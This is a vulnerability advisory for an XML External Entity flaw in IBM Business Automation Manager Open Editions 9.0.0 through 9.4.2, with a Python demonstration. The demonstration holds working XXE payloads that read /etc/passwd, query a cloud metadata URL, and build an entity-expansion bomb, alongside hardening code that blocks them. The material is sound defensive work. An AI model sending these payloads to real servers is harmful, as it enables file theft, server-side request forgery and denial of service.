Impact
IBM Business Automation Manager Open Editions versions 9.0.0 through 9.4.2 process XML input in a way that honours external entity references, a weakness classified as XML External Entity Injection (XXE), CWE-611. An attacker who submits a crafted XML document can declare an entity whose SYSTEM identifier is a file path or a URL, and the server resolves that reference on the attacker's behalf: the referenced content is read into the document (exposing files the application can reach, or the responses of internal services reachable from the server), or the entity declarations are nested so that expansion consumes significant memory. The consequences are disclosure of confidential information and a server that becomes unresponsive under the resource load.
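The mechanism described above, as an added example that is not part of this advisory or of the product: a constructed file-read payload and a constructed internal-URL payload are fed to Python's standard-library SAX parser (expat), which stands in for the product's XML parser, with the fetch the parser would perform intercepted so nothing touches disk or network; beside it sit the two controls that stop the attack, refusing any document that carries a DOCTYPE and parsing with external general entities disabled. The payloads, the simulated file contents, the metadata URL and all function names are this example's own assumptions.

```python
"""XXE (CWE-611) demonstration with Python's stdlib SAX parser (expat).

Constructed example: payloads, simulated file contents and function names
are assumptions of this example, not taken from the affected product.
"""
import io
import xml.sax
import xml.sax.handler
from xml.sax.xmlreader import InputSource

# Constructed attacker payloads of the two kinds the advisory describes:
# an external entity pointing at a local file, and one pointing at a URL
# (here a cloud metadata endpoint, a classic server-side request target).
FILE_READ_XXE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE req [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b'<req><name>&xxe;</name></req>'
)
SSRF_XXE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE req [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>'
    b'<req><name>&xxe;</name></req>'
)


def entity_bomb(depth=8, fanout=10):
    """Nested internal entities ("billion laughs"): each level expands to
    `fanout` copies of the level below, so the single reference in the body
    expands to fanout**depth copies of the seed string. Only the document is
    built here; it is never handed to an unprotected parser."""
    ents = ['<!ENTITY e0 "lol">']
    for i in range(1, depth + 1):
        ents.append('<!ENTITY e%d "%s">' % (i, ("&e%d;" % (i - 1)) * fanout))
    doc = '<?xml version="1.0"?><!DOCTYPE bomb [%s]><bomb>&e%d;</bomb>'
    return (doc % ("".join(ents), depth)).encode()


class RecordingResolver(xml.sax.handler.EntityResolver):
    """Stands in for the real file/URL fetch: records which system
    identifier the parser asked for and returns constructed bytes, so the
    example runs offline instead of reading disk or the network."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = InputSource()
        src.setByteStream(io.BytesIO(b"root:x:0:0:root:/root:/bin/bash"))
        return src


class TextCollector(xml.sax.handler.ContentHandler):
    """Collects character data, i.e. what the attacker would see echoed
    back if the application reflects the parsed values."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def parse(xml_bytes, external_entities):
    """Parse with external general entities enabled (the vulnerable
    configuration) or disabled (hardened).
    Returns (system identifiers fetched, text content seen)."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, external_entities)
    resolver, collector = RecordingResolver(), TextCollector()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return resolver.requested, "".join(collector.text)


def reject_doctype(xml_bytes):
    """Fail-closed ingestion guard: untrusted documents have no business
    carrying a DTD, and without one neither external entities nor an
    expansion bomb can be declared. XML keywords are case-sensitive, so
    only this exact spelling can open a DTD; a comment containing the
    string is also rejected, which errs on the safe side."""
    return b"<!DOCTYPE" in xml_bytes


if __name__ == "__main__":
    for payload in (FILE_READ_XXE, SSRF_XXE):
        fetched, text = parse(payload, external_entities=True)
        print("vulnerable: fetched %s, leaked %r" % (fetched, text))
        fetched, text = parse(payload, external_entities=False)
        print("hardened:   fetched %s, leaked %r" % (fetched, text))
    print("guard rejects entity bomb:", reject_doctype(entity_bomb()))
```

Running the vulnerable path shows the parser asking the resolver for file:///etc/passwd and for the metadata URL and placing the returned bytes inside the name element; the hardened path never calls the resolver and the entity expands to nothing. In the product's own stack the equivalent controls are whatever its XML parser offers for disallowing DTDs and disabling external general and parameter entities, applied to every parser instance that touches untrusted input.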
Affected Systems
The vulnerability affects IBM Business Automation Manager Open Editions. All deployments of the product in the 9.0.0 through 9.4.2 release series are susceptible.
Risk and Exploitability
The CVSS score for this issue is 7.6, indicating high severity. No EPSS score is available, and the issue is not listed in the CISA KEV catalog, so there is no public evidence of exploitation in the wild at the time of writing; absence from KEV is not evidence that exploitation is impractical, since XXE payloads are simple to construct once a parsing endpoint is found. The attack vector is presumed to be remote, requiring an attacker to deliver a crafted XML payload to an endpoint that parses it; the score alone does not say whether authentication is needed, so any endpoint that accepts externally supplied XML should be treated as in scope. If the application accepts untrusted XML over a network interface, an adversary could exploit the flaw to read files reachable by the server process, to make the server fetch internal or external URLs (server-side request forgery), and to exhaust memory through entity expansion, potentially causing denial of service. The overall risk is elevated because any accessible XML service in the affected product could be targeted.
OpenCVE Enrichment